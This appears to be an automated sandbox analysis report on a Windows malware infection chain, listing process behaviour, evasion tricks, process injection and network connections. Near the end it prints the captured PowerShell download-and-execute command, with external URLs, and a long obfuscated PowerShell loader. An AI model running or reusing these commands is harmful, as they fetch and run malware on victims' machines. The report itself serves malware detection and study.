                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT caption, serialnumber FROM Win32_DiskDrive
                        Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFDB442D044
                        Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D044
                        Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 59FB83A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3839Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5915Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6406Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3325Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7413Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2352Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2788Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep count: 6406 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep count: 3325 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 7228Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A90B80 FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,25_3_00007DF415A90B80
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A72514 GetSystemInfo,25_3_00007DF415A72514
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache
                        Source: powershell.exe, 0000000A.00000002.2426888871.00000157E4EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
                        Source: powershell.exe, 00000002.00000002.3669521956.00000297E90D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_04BEDAAC LdrInitializeThunk,LdrInitializeThunk,16_2_04BEDAAC
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 24_3_02FC0283 mov eax, dword ptr fs:[00000030h]24_3_02FC0283

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.149.241.141 2023
                        Source: Yara matchFile source: amsi64_7352.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7352, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7832, type: MEMORYSTR
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1DC5BE20000 protect: page read and write
                        Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded q"x8w^gI@JByWEXJ"hQ>i
                        Source: unknownProcess created: Base64 decoded q"x8w^gI@JByWEXJ"hQ>i
                        Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded q"x8w^gI@JByWEXJ"hQ>i Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3F10000Jump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeMemory written: C:\Windows\System32\dllhost.exe base: 1DC5BE20000
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeMemory written: C:\Windows\System32\dllhost.exe base: 7FF642EC14E0
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx'Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\grm2bfvsa42.vbs" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Public\ilurgw960k7fwnm.xlsx"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKlJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmpnscfg.exe "C:\Program Files\Windows Media Player\wmpnscfg.exe"
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command function downloadandrun([string]$url, [string]$destination) { invoke-webrequest -uri $url -outfile $destination ; start-process -filepath $destination -wait };downloadandrun -url 'https://www.pts.group/ab/ab.vbs' -destination 'c:\users\public\grm2bfvsa42.vbs';downloadandrun -url 'https://www.fornid.com/ab/list%20of%20required%20items.xlsx' -destination 'c:\users\public\ilurgw960k7fwnm.xlsx'
